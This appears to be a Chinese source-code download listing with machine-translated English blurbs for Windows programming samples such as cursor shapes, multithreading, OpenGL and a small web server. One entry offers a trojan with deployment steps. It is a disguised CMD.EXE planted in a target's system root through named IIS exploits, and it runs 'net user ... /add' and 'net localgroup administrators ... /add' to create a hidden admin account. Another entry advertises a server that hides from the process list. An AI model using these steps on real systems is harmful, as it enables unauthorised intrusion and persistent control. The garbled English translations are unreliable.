改变鼠标形状的小程序。运行程序后,让鼠标停留在窗口的不同位置上,可以显示出不同的形状。-change the shape of the mouse small programs. Operational procedures, so that the mouse to stay in the window on different locations can demonstrate different shapes. 下载
|
多线程编程,实现四个窗口同时运行(每个窗口执行不同的内容)-multithreaded programming, the realization of the four windows simultaneously run (each window implementation of the different elements) 下载
|
让窗口运行在不同的分辨率下-window operation for the different resolutions 下载
|
如果您对IE4.0熟悉的话,你将知道在Internet Settings高级设置中有一个选项:“在新的进程中浏览(英文:Browse in a New Process)”,如果你把它前面的对钩去掉,然后运行IE,并打开任务管理器查看所有进程,你将会发现没有新的IExplorer.exe进程出现。反之,则新的IExplorer.exe进程出现。 当我们需要许多数据在程序实例之间共享的时候,这种能使多个实例运行在同一个进程空间的程序是非常有用的。它的实现很简单,众所周知,启动任何一个应用程序有两种途径,要么通过浏览器要么通过API调用诸如CreateProcess。首先侦察特定的窗口类是否存在,如果不存在,就创建一个新的窗口类,如果存在,那么使最近创建的进程发送一个消息到已存在的窗口,并使新近运行的实例窗口处于激活状态,先前的程序实例将启动一个单独的线程。 在此示例中,作者采用了一个MFC MDI程序,即使有多个程序实例在运行,任务管理器或者进程查看器(Process Viewer)将只会显示一个进程,当如果用WINDOWS自带程序SPY++查看,您将会发现该进程拥有许多线程,并且不同的MDI窗口集合分别属于不同的线程-seemed familiar with the case, You will know that the Internet Advanced Settings, there is a choice : "In the new process here (in English : Browse in a New Process)" If you put it right in front of the hook removed, and then run IE, and open the Task Manager View all process, You will find no new IExplorer.exe process. Instead, the new IExplorer.exe process. When we needed the procedure much of the data shared between the examples, This can run multiple instances of a process in the same space procedure is very useful. It is very simple to achieve, as we all know, launching an application of any two channels either through the browser or through API calls such as CreateProcess. First reconnaissance particular window class existence, if they do not exist, create a new window type 下载
|
可以让窗口运行在不同的分辨率下,共读者参考,并提出一些意见。-window can run on different resolutions, a total of reference of the reader, and make some suggestions. 下载
|
让窗口运行在不同的分辨率下 在列表框中显示各种显示模式的宽度、高度、色彩深度、刷新率,并为各显示模式编号-window operation for the different resolutions in the list box showing the display mode of width, height, color depth, refresh rate, and the display mode No. 下载
|
992年7月,SGI公司首次发布了作为三维图形编程接口的OpenGL。目前它已成为国际上通用的开放式三维图形标准。它被集成到Unix、Windows NT 4.0、Windows 98等窗口系统中。各种游戏加速卡、专用加速部件都能不同程度地提高OpenGL程序的运行性能。OpenGL是一个图形硬件的软件接口("GL"即Graphics Library)。图形程序员可以利用它提供的接口函数设计高品质的三维彩色图像所需的对象和操作。-992, in July, SGI has announced the first as three-dimensional graphics programming interface OpenGL. Currently, it has become common on the open 3D graphics standard. It was integrated into the Unix, Windows NT 4.0, Windows 98, such as window systems. Games Accelerator, dedicated components can speed up the different levels to improve the functioning of OpenGL performance. OpenGL graphics hardware is a software interface ( "GL" that the Graphics Library). Graphics programmer can use it for the interface design function of high-quality three-dimensional color images of objects and operations. 下载
|
据说这个程序(omni.com)是97年的Mekka ’97 4K Intro比赛的一等奖作品,整个程序全长4095字节,其中包含133字节的自解压程序(类RAR压缩),未解压的程序长4782字节。三维场景包含144个立方体,367个面,362个点,15个不同的64*64的纹理…… 把下面的文本保存为 1.txt,再加上下面的内容 然后打开一个DOS窗口,输入 debug < 1.txt 你就得到了一个 1.com 程序,运行即可。 -said this procedure (omni.com) is the Mekka 97 4K Intro97 won the competition works, the whole process 4,095 byte length, which includes 133 bytes of self-extracting (RAR compression type), resulting in decompression procedures 4,782 bytes long. 3D cube contains 144, 367-, 362, 15 of 64 * 64 Texture ... put the following text be kept as 1.txt, coupled with the following contents then opened a DOS window, input debug lt; You get 1.txt a M. procedures can be run. 下载
|
你是不是经常在开始菜单的运行窗口里运行命令呢? 看看这个漏洞: http://zdnet.com.com/2100-1105-964057.html win2000和xp在执行搜索的时候, 首先查找根目录 而开始菜单的运行窗口里执行命令, 也是首先在系统盘的根目录里进行查找. 这个漏洞其实是已经是公开的秘密了. 既然现在作为漏洞公布出来, 我也就把网上的PasswordReminder.cpp拿来改了改 加了一个加超级管理员用户和执行cmd.exe的功能. 使用方法: 把程序解压, 把压缩包里的文件 CMD.EXE (该文件具有隐藏和只读属性) 释放到目标机器的系统盘根目录, 一般都是在C:比如利用UNICODE/Decode漏洞就有写根目录的权限, 同时Asp/fp30reg.dll等远程溢出出来的Shell, 一般都只有匿名权限, 但是它具有写根目录的权限 这个时候, 就可以把本程序放到目标机器的系统盘根目录 只要等管理员在机器的开始菜单里运行命令: cmd 一切尽在掌握中.:) PS: 系统执行后, 会先产生一个线程来做一些处理 然后用system()函数调用cmd.exe来让用户能够执行命令. 产生出来的线程会产生两个进程序执行如下两个命令: net user ISUR_IWAM wwwcnhonkercom /add net localgroup administrators ISUR_IWAM /add 这样就在系统上增加了一个超级- 下载
|
Http Server 1.1 By Cooldiyer 一个简单的个人web服务器。适合于所有win32平台,能自动在进程表中隐藏。 可实现的功能是: 1.可自定义网页根目录。 2.主页默认为index.htm。 3.可自定义端口。 4.可自定义服务端每次发送数据包的大小。 5.为稳定期间,本服务器使用多线程的方法,可满足不同场合的使用。 6.运行时可以隐藏窗口。 用法:http rootdir port byte [-hide] 参数说明: rootdir -> 网页的根目录 port -> 服务器的端口 byte -> 服务器每次发送数据包的大小(字节),建议设定为1024字节 -hide -> 程序隐藏窗口运行 例子1: http c:\wwwroot\ 80 1024 http服务器的网页的根目录为c:\wwwroot\, 端口为80, 传送数据包的大小为1024字节。 例子2: http c:\wwwroot\ 80 1024 -hide http服务器的网页的根目录为c:\wwwroot\, 端口为80, 传送数据包的大小为2048字节,隐藏运行。 注意: 1.由于本程序隐藏窗口,所以请小心使用,谢谢下载。 -By Cooldiyer a simple personal web server. Suitable for all win32 platform, the process can be automatically hidden table. The function can be realized are : 1. The website can be obtained from the definition of the root directory. 2. Home default index.htm. 3. Self-defined ports. 4. Services available from the definition of each side to send the size of the packets. 5. For the stability period, the use of multi-threaded server approach to meet the use of different occasions. 6. Running window can be hidden. Usage : http rootdir port byte [-hide] parameters : rootdir - gt; Web root directory port-gt; The server port byte-gt; Each server to send data packets the size (in bytes), proposes to set a 1024 byte-hide-gt ; windows operating procedures hidden an example : http c : \ wwwroot \ 80 10 下载
|